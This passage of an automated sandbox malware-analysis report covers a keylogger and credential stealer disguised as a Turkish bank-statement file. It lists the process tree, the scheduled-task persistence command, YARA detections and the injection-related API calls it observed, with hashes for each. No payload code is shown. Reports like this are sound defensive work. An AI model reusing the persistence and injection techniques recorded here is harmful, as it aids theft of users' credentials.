File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	08:07:27
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmp5CB8.tmp"
Imagebase:	0x390000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	08:07:28
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	08:07:28
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"
Imagebase:	0x390000
File size:	866'816 bytes
MD5 hash:	18709F2606D2834D725A5677BDD4D737
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	08:07:28
Start date:	10/12/2024
Path:	C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Hesap_Hareketleri_10122024_html.exe"
Imagebase:	0x8d0000
File size:	866'816 bytes
MD5 hash:	18709F2606D2834D725A5677BDD4D737
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4710756454.000000000043D000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.4714585363.0000000002CBA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000A.00000002.4714585363.0000000002BB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	08:07:31
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe
Imagebase:	0x400000
File size:	866'816 bytes
MD5 hash:	18709F2606D2834D725A5677BDD4D737
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000B.00000002.2368784704.0000000003A1A000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 37%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	08:07:31
Start date:	10/12/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	08:07:34
Start date:	10/12/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\UDYiGmDlq" /XML "C:\Users\user\AppData\Local\Temp\tmpA327.tmp"
Imagebase:	0x390000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	08:07:34
Start date:	10/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:07:34
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"
Imagebase:	0x60000
File size:	866'816 bytes
MD5 hash:	18709F2606D2834D725A5677BDD4D737
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:07:34
Start date:	10/12/2024
Path:	C:\Users\user\AppData\Roaming\UDYiGmDlq.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\UDYiGmDlq.exe"
Imagebase:	0xe00000
File size:	866'816 bytes
MD5 hash:	18709F2606D2834D725A5677BDD4D737
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000010.00000002.4710754013.0000000000430000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000010.00000002.4714892909.00000000032C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000010.00000002.4714892909.00000000033CA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	147
Total number of Limit Nodes:	7

Executed Functions

Function 070D4123 Relevance: 8.8, Strings: 5, Instructions: 2598COMMON

Download Yara Rule

Strings

4'cq, xrefs: 070D5FE8
4'cq, xrefs: 070D6D7E
4'cq, xrefs: 070D4F7C
(ocq, xrefs: 070D41FE
4'cq, xrefs: 070D5104

Memory Dump Source

Source File: 00000001.00000002.2334679453.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70d0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: (ocq$4'cq$4'cq$4'cq$4'cq
API String ID: 0-3936597161
Opcode ID: ac9e9242be3f74b1952df4106f837541b5011b9ca6aa84dcf4a25a52ed681fd0
Instruction ID: df263c4c1ba9317a75252744bb1998b38ffd142058bfaa9054f5d5af84224403
Opcode Fuzzy Hash: ac9e9242be3f74b1952df4106f837541b5011b9ca6aa84dcf4a25a52ed681fd0
Instruction Fuzzy Hash: BB43FCB4A00319CFDB64DF68C888A9DBBB2BF49350F158695E9099B361DB31ED81CF40

Function 024F3E34 Relevance: 2.7, Strings: 2, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t^cl, xrefs: 024F7004
`Ycl, xrefs: 024F6FD8

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: `Ycl$t^cl
API String ID: 0-2306952220
Opcode ID: 776c56f17eefe2f84c35bb9786eb2d60bcb9d9c016f6819f30053658bc7193fc
Instruction ID: 30d5510660c146ec5772df70e792105ab0fc8c8e5efa733cc5ac9c24e132f39a
Opcode Fuzzy Hash: 776c56f17eefe2f84c35bb9786eb2d60bcb9d9c016f6819f30053658bc7193fc
Instruction Fuzzy Hash: F481E774E006088FDF09DFA9D894AEEBBB2FF88300F10852AD519AB369DB355941CF51

Function 024F6F90 Relevance: 2.6, Strings: 2, Instructions: 139
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

t^cl, xrefs: 024F7004
`Ycl, xrefs: 024F6FD8

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: `Ycl$t^cl
API String ID: 0-2306952220
Opcode ID: eee15b62813dd5338fa43cb0f48e61b77def42446c18a7c91c1a1d11410ff4d4
Instruction ID: 326b7e2c37127183aa799bcf3beb08ad952fbae979de3f32b9ba06c7e854114a
Opcode Fuzzy Hash: eee15b62813dd5338fa43cb0f48e61b77def42446c18a7c91c1a1d11410ff4d4
Instruction Fuzzy Hash: D151D7B0E016589FCB44DFA9D990AEEBBB2FF88300F10852AD515AB369DB345D41CF90

Function 070D1240 Relevance: 1.9, Strings: 1, Instructions: 649
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 070D138B

Memory Dump Source

Source File: 00000001.00000002.2334679453.00000000070D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_70d0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: b51dc09128f7440f5d9e733142edff0dbc60fb87499985277873124905412517
Instruction ID: 5d49813772120008facb6edf4f8d1698d0c668f6071409e8c70d26179ed47c24
Opcode Fuzzy Hash: b51dc09128f7440f5d9e733142edff0dbc60fb87499985277873124905412517
Instruction Fuzzy Hash: 1162DCB4E01228CFDB64DF69C984BDEBBB2BB49301F1181E9D409A7255DB34AE85CF50

Function 07B3A687 Relevance: .6, Instructions: 624COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d881def46fd6f2e9ade966ef92ca39a4d505d7c2ed8f51328597490aae44d16
Instruction ID: 67876abce21ab8df1910653478c3ccc1958078bea9c54698d1b4ea0e3111bd50
Opcode Fuzzy Hash: 7d881def46fd6f2e9ade966ef92ca39a4d505d7c2ed8f51328597490aae44d16
Instruction Fuzzy Hash: D732ACB17012159FEB19DB69C450BAEBBF6EF89300F2084AEE5859B390DB34ED41CB51

Function 07B38E28 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89d5b20281c32c8ee3bc77ab84dd52f11d516c242f7c05e74999137b95791ec8
Instruction ID: 472b082c4c85bfad0e34b2f21bd8a8a9c681fbdfe501a00deae43c4a39046bfb
Opcode Fuzzy Hash: 89d5b20281c32c8ee3bc77ab84dd52f11d516c242f7c05e74999137b95791ec8
Instruction Fuzzy Hash: 22015AB586A118DFDB109F90D4083F8BBB8FB1B705F0020E6E40EA2212D7B02AC4CE61

Function 07B39196 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f5a25c40809ca1fea208acd4e2e52859d1bd3a1221ce55ad1d6c91565930f9
Instruction ID: 69b17fbc1c8071250cf3a80598edf03d56b57950554bd5f34e5a5fc92a1f0bb7
Opcode Fuzzy Hash: 22f5a25c40809ca1fea208acd4e2e52859d1bd3a1221ce55ad1d6c91565930f9
Instruction Fuzzy Hash: 1CE04FB5D5E408DBD700AEA5A4081F8BBBCFB0B60AF0420E5D50ED3601D3615A90CE54

Function 024FD570 Relevance: 6.1, APIs: 4, Instructions: 133
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 024FD5FE
GetCurrentThread.KERNEL32 ref: 024FD63B
GetCurrentProcess.KERNEL32 ref: 024FD678
GetCurrentThreadId.KERNEL32 ref: 024FD6D1

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 29bdb5736a5bb4d380b830aee713e87dea3025e2a6335ca813ceb19abf25832f
Instruction ID: 7d2777518274c624ee200bbafda8123e69efeb238d7b888e6f12dee642b8f85a
Opcode Fuzzy Hash: 29bdb5736a5bb4d380b830aee713e87dea3025e2a6335ca813ceb19abf25832f
Instruction Fuzzy Hash: 3A5188B1900209CFEB54DFA9D98879EBBF1EF88304F24845ED509A7391D7345944CB66

Function 024FD580 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 024FD5FE
GetCurrentThread.KERNEL32 ref: 024FD63B
GetCurrentProcess.KERNEL32 ref: 024FD678
GetCurrentThreadId.KERNEL32 ref: 024FD6D1

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d98214b7eab15c1fbd409f967a4ac331187fa2b215c4fbeb4b4b2d478046b888
Instruction ID: e5ab976b5df2881f6bfc9d91405cddca135c291a2deaf45867b992d56209339a
Opcode Fuzzy Hash: d98214b7eab15c1fbd409f967a4ac331187fa2b215c4fbeb4b4b2d478046b888
Instruction Fuzzy Hash: A55167B1900209CFEB54DFAAD948B9EBBF1EF88314F24845AE509A7350D734A944CF65

Function 07279250 Relevance: 3.9, Strings: 3, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8gq, xrefs: 07279387
8gq, xrefs: 072792CF
8gq, xrefs: 072792DF

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 8gq$8gq$8gq
API String ID: 0-3143538186
Opcode ID: 5915886019ccdb8bdd80c99ffd4918ec4aa7f759d52bb881ebc4d2dd3aa6212e
Instruction ID: 160b8c22ec2349cd8f5fec5a33bf20b2358848baf60dce5bb3e134eecf214f06
Opcode Fuzzy Hash: 5915886019ccdb8bdd80c99ffd4918ec4aa7f759d52bb881ebc4d2dd3aa6212e
Instruction Fuzzy Hash: B3313BF4A38306DFDB00ABA4865557E7BB1FB86300F51445BD5C2E73C5DAB0A882C792

Function 0727839F Relevance: 3.8, Strings: 3, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

8, xrefs: 07278413
$cq, xrefs: 072783F0
$cq, xrefs: 072783E4

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: 8$$cq$$cq
API String ID: 0-2950882162
Opcode ID: 1ae96f8a7f625e09a7f956bb2b3a0a65feb3c5986d5b44c214a7ec1b2a176a43
Instruction ID: abf0ab37b94eea1764c0a00db777d3c35e568e9d6c066b2b177c97aadc2501a9
Opcode Fuzzy Hash: 1ae96f8a7f625e09a7f956bb2b3a0a65feb3c5986d5b44c214a7ec1b2a176a43
Instruction Fuzzy Hash: 5101FEB0770206CBDB148A68CD5B7A97B61BB41700F544C65D8069F681DAB05C50C791

Function 072782D0 Relevance: 2.6, Strings: 2, Instructions: 57
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$cq, xrefs: 072782E6
$cq, xrefs: 072782F2

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: $cq$$cq
API String ID: 0-2695052418
Opcode ID: 24df696a998165867da46f7be22471d05713ee0f0bbae3eaf41c648f042cb310
Instruction ID: b6a374227cbf7ec7bdec51f5f5af39b47a2da8a50cf2b7f62ccfb1391acc9db8
Opcode Fuzzy Hash: 24df696a998165867da46f7be22471d05713ee0f0bbae3eaf41c648f042cb310
Instruction Fuzzy Hash: 7411C1F0939246DFC715DB68DA0C266BFB5BB07301F0482ABE009D7542D7B48985C7A6

Function 072782C1 Relevance: 2.5, Strings: 2, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$cq, xrefs: 072782E6
M, xrefs: 072782A4

Memory Dump Source

Source File: 00000001.00000002.2334948601.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7270000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID:
String ID: M$$cq
API String ID: 0-541270781
Opcode ID: d73e9f04bdd95f95c029482cce7e7cf92fe79ef572808f00fa3918f1a3a614d1
Instruction ID: 871ddf2f716b0fdd20ec6cafd9a613fa845471fe6cc02ac2a0ed23a25e3a800b
Opcode Fuzzy Hash: d73e9f04bdd95f95c029482cce7e7cf92fe79ef572808f00fa3918f1a3a614d1
Instruction Fuzzy Hash: 5F11D2F193A683CBC710CB64DB0D324BB71BB43302F1482A7D44A8B942D7B58944C796

Function 07B35C3C Relevance: 1.8, APIs: 1, Instructions: 252
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07B35E7E

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: beba254335da3a83c9160d43e6d29b0ce7c7c0d7968a414f3d5201513aeb62f1
Instruction ID: c764fb423fb2d74d6f8908e2fd804fdc7de08f0a2e2a8179e80ef954fb9ff2bd
Opcode Fuzzy Hash: beba254335da3a83c9160d43e6d29b0ce7c7c0d7968a414f3d5201513aeb62f1
Instruction Fuzzy Hash: E1A17DB1D0021ACFEB20CFA8C845BEDBBB2FF48310F1485A9D858A7244DB749995CF91

Function 07B35C48 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 07B35E7E

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: a2933435028fbda95489dd30622bb3da972526905f4e84aaca345c638c4a038c
Instruction ID: 9ca70a073474901ef249566a690071671cd68266506377ca89d312c0a4ccf39e
Opcode Fuzzy Hash: a2933435028fbda95489dd30622bb3da972526905f4e84aaca345c638c4a038c
Instruction Fuzzy Hash: 1D916CB1D0061ACFEB24CF68C844BEDBBB2FF48310F1485A9D858A7254DB749995CF91

Function 024FB300 Relevance: 1.7, APIs: 1, Instructions: 204
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 024FB566

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 31a8b8510f152787c07408618bcf76b83b51f5e481d99d1a42a2f96b3f26af47
Instruction ID: 2b02e96107b6efc69dab7cb2df1b4adabb2052fb884960077b05edbb303b603c
Opcode Fuzzy Hash: 31a8b8510f152787c07408618bcf76b83b51f5e481d99d1a42a2f96b3f26af47
Instruction Fuzzy Hash: 198112B0A00B458FDB64DF2AD44475BBBE2FF89308F00892AD58A97B40D774E949CB91

Function 024F44B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 024F59C9

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 34891b3f7532a8f86b844d7a1740b223f55b1aad7d40302cedb3e59dab8c61e4
Instruction ID: 2616f060af02d698decbe1832347838eac6f18ae9945307100ac8011bc32a183
Opcode Fuzzy Hash: 34891b3f7532a8f86b844d7a1740b223f55b1aad7d40302cedb3e59dab8c61e4
Instruction Fuzzy Hash: 0241D1B1C00719CBDB24DFA9C884B9EBBF5FF88304F60805AD508AB255DB756949CF90

Function 024F590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 024F59C9

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 8c7de9e5283a98aa9a7873f1dfe8d137e91c469eada51099d1a7eb954aa592a4
Instruction ID: f57f4e79d77fb305996f237f26b0699696630fa4e16818defff5233dafd17864
Opcode Fuzzy Hash: 8c7de9e5283a98aa9a7873f1dfe8d137e91c469eada51099d1a7eb954aa592a4
Instruction Fuzzy Hash: D841E1B1C00719CBDB24CFA9C984BDEBBF2BF88304F60805AD508AB255DB75694ACF50

Function 07B359B9 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07B35A50

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 91b7334c9cbdfcb97d56fe150a7705f8798d5509a798e9ed790460a8188e70e4
Instruction ID: 8e148b9b5c52ae2e0953ba2d5bf7a77c408d85c465992f55cfe2135685fdd6e9
Opcode Fuzzy Hash: 91b7334c9cbdfcb97d56fe150a7705f8798d5509a798e9ed790460a8188e70e4
Instruction Fuzzy Hash: 00215CB59003499FDB10CFA9C885BEEBFF4FF48310F14842AE958A7241D7789954DBA0

Function 07B35820 Relevance: 1.6, APIs: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07B358A6

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 313f23afceadd6ce8a02b56f4bf54b5439158e4714382bce71787f51e3d0c71f
Instruction ID: f3f707eb7d5d53042f10de41ebb3ed4397e6b47a991dc3979c4776a00c07d52c
Opcode Fuzzy Hash: 313f23afceadd6ce8a02b56f4bf54b5439158e4714382bce71787f51e3d0c71f
Instruction Fuzzy Hash: C2216DB2D102098FDB20DFA9C8857EEFBF4EF49320F14842AD459A7241CB789945CFA1

Function 07B35AA9 Relevance: 1.6, APIs: 1, Instructions: 69COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07B35B30

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 3b7451127a6321e26817895584f86c92400030d930099cd9b6bdce40f5ae3635
Instruction ID: 3e46dcd717e29d12d5aa58b03a6dfabb24d42037527eb8cef834f91bec14da4a
Opcode Fuzzy Hash: 3b7451127a6321e26817895584f86c92400030d930099cd9b6bdce40f5ae3635
Instruction Fuzzy Hash: 29218CB2C003499FDB10CFA9C881AEEFBF4FF48320F10842AE958A3240C7359951DBA1

Function 07B359C0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 07B35A50

Memory Dump Source

Source File: 00000001.00000002.2337747267.0000000007B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7b30000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 43b2f0fed38fab1b4b9f2a288483c84b28bb5b23d12e95d0897e1136946d37d8
Instruction ID: 1aabd0dbc01fe03c56391368532f6f91b67c0d5502c3b138c8dfe2f78d3b7ffe
Opcode Fuzzy Hash: 43b2f0fed38fab1b4b9f2a288483c84b28bb5b23d12e95d0897e1136946d37d8
Instruction Fuzzy Hash: 6D213BB19003599FDB10CFA9C885BDEBBF5FF48310F148429E958A7240D7749954DBA1

Function 024FD7C0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 024FD84F

Memory Dump Source

Source File: 00000001.00000002.2312047012.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 024F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_24f0000_Hesap_Hareketleri_10122024_html.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2749c4d8e04c183375dea865c158233dd7a98821889f61e97eb909d09dff24ce
Instruction ID: d63d556d4fd46ced9f09ad3be8476d14d957c83c757c6bc3f69d8bf837e5665f
Opcode Fuzzy Hash: 2749c4d8e04c183375dea865c158233dd7a98821889f61e97eb909d09dff24ce
Instruction Fuzzy Hash: 6C21D2B5D00249AFDB10CF9AD984AEEBFF4EB48320F14841AE918A7310D374A954DF61

Function 07B35AB0 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 07B35B30

Memory Dump Source

